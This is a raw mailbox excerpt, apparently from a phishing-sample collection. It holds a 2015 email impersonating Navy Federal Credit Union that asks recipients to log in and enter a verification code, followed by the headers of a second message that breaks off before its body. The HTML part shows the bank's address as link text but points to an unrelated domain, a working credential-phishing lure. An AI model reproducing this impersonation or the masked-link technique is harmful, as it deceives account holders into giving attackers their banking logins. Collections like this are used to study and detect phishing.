From: "Navy Federal Credit Union" <info@mynfcu.org>
Date: Thu, 05 Nov 2015 13:11:47 -0600
Return-Path: info@mynfcu.org
Message-ID: <LPD-RDS01msSVhGOD6g000001ff@LPD-RDS01.LPD.local>
X-OriginalArrivalTime: 05 Nov 2015 19:11:49.0018 (UTC) FILETIME=[D223C7A0:01D117FD]
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 238

You will not see this in a MIME-aware mail reader.
--===============0409755490==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


 For security reasons we are verifying and confirming our customers emails =
on our database.
 This is your account email verification code
 =

MKGO019

 Login here https://www.navyfederal.org go to your account settings to ente=
r your verification
 Thank you for your co-operation.
 Copyright 2015 Navy Federal Credit Union.

--===============0409755490==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><img src=3D"http://navyfederal.org/images/structure/=
nfculogo.png" alt=3D"link.com" border=3D"0" height=3D"72" width=3D"262"><br>
<p>For security reasons we are verifying and confirming our customers email=
s on our database.</p>
<p>This is your account email verification code</p>
<p><h1>MKGO019</h1></p>
<p>Login here <a href=3D"http://codelaertnfcu.granvillensw2142.org/com.htm"=
 target=3D"_blank">https://www.navyfederal.org</a> go to your account setti=
ngs to enter your verification</p>
<p>Thank you for your co-operation.</p>
<p>Copyright 2015 Navy Federal Credit Union.</p></html>
--===============0409755490==--

From jose@monkey.org Fri Nov  6 14:28:02 2015 +0000
Return-Path: may.sandnes@bodo.kommune.no
Delivered-To: jose@monkey.org
X-FDA: 70824405204.16.deer19_bbbafe69892e
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 18,1.407,0,4a65da1fd309350e,d41d8cd98f00b204,may.sandnes@bodo.kommune.no,:in@owa.org,RULES_HIT:10:41:72:355:375:379:582:589:962:967:973:978:983:988:989:1152:1158:1189:1208:1224:1260:1261:1263:1311:1313:1314:1345:1381:1431:1436:1437:1513:1515:1516:1517:1521:1535:1542:1567:1588:1589:1592:1593:1594:1711:1714:1730:1747:1777:1792:2393:2525:2527:2560:2563:2682:2685:2828:2859:2890:2895:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3586:3865:3867:3868:3870:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4552:5007:6117:6261:6650:6688:6692:7801:8518:8603:8885:8957:9025:9388:9908:10004:10049:10346:11656:11657:11658:11914:12043:12517:12519:12555:12660:12661:12955:12958:12967:13139:13141:13163:13229:13230:14093:21080:21212:30001:30022:30054:30069:30070:30090:30091,0,RBL:91.208.24.130:@bodo.kommune.no:.lbl8.mailshell.net-62.8.176.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL
X-HE-Tag: deer19_bbbafe69892e
X-Filterd-Recvd-Size: 5170
Received: from mail.bodo.kommune.no (mail.bodo.kommune.no [91.208.24.130])
	by imf21.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri,  6 Nov 2015 14:28:00 +0000 (UTC)
Received: from mail.bodo.kommune.no (unknown [127.0.0.1])
	by IMSVA (Postfix) with ESMTP id 71CF1F6B7F;
	Fri,  6 Nov 2015 15:27:57 +0100 (CET)
Received: from BKEXCH01.bkad.local (unknown [10.0.0.39])
	by mail.bodo.kommune.no (Postfix) with ESMTPS id 1B6C8F6BE2;
	Fri,  6 Nov 2015 15:27:57 +0100 (CET)
Received: from BKEXCH03.bkad.local ([fe80::ed52:1ecd:dcad:e6a8]) by
 BKEXCH01.bkad.local ([fe80::5efe:10.0.0.39%11]) with mapi id 14.03.0266.001;
 Fri, 6 Nov 2015 15:27:58 +0100
